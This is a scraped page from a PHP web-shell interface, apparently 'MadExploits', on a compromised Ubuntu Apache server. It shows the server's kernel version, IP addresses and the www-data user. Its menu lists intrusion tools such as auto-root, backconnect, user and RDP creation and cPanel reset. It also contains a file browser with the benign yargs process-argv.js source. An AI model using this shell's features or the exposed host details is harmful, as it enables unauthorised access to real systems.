Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.19
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
yargs /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
apply-extends.js
1.95
KB
-rw-r--r--
argsert.js
2.36
KB
-rw-r--r--
command.js
15.4
KB
-rw-r--r--
completion-templates.js
1.35
KB
-rw-r--r--
completion.js
4.55
KB
-rw-r--r--
is-promise.js
147
B
-rw-r--r--
levenshtein.js
2.07
KB
-rw-r--r--
middleware.js
2.11
KB
-rw-r--r--
obj-filter.js
269
B
-rw-r--r--
process-argv.js
1.13
KB
-rw-r--r--
usage.js
16.29
KB
-rw-r--r--
validation.js
11.45
KB
-rw-r--r--
yerror.js
254
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : process-argv.js
function getProcessArgvBinIndex () { // The binary name is the first command line argument for: // - bundled Electron apps: bin argv1 argv2 ... argvn if (isBundledElectronApp()) return 0 // or the second one (default) for: // - standard node apps: node bin.js argv1 argv2 ... argvn // - unbundled Electron apps: electron bin.js argv1 arg2 ... argvn return 1 } function isBundledElectronApp () { // process.defaultApp is either set by electron in an electron unbundled app, or undefined // see https://github.com/electron/electron/blob/master/docs/api/process.md#processdefaultapp-readonly return isElectronApp() && !process.defaultApp } function isElectronApp () { // process.versions.electron is either set by electron, or undefined // see https://github.com/electron/electron/blob/master/docs/api/process.md#processversionselectron-readonly return !!process.versions.electron } function getProcessArgvWithoutBin () { return process.argv.slice(getProcessArgvBinIndex() + 1) } function getProcessArgvBin () { return process.argv[getProcessArgvBinIndex()] } module.exports = { getProcessArgvBin, getProcessArgvWithoutBin }
Close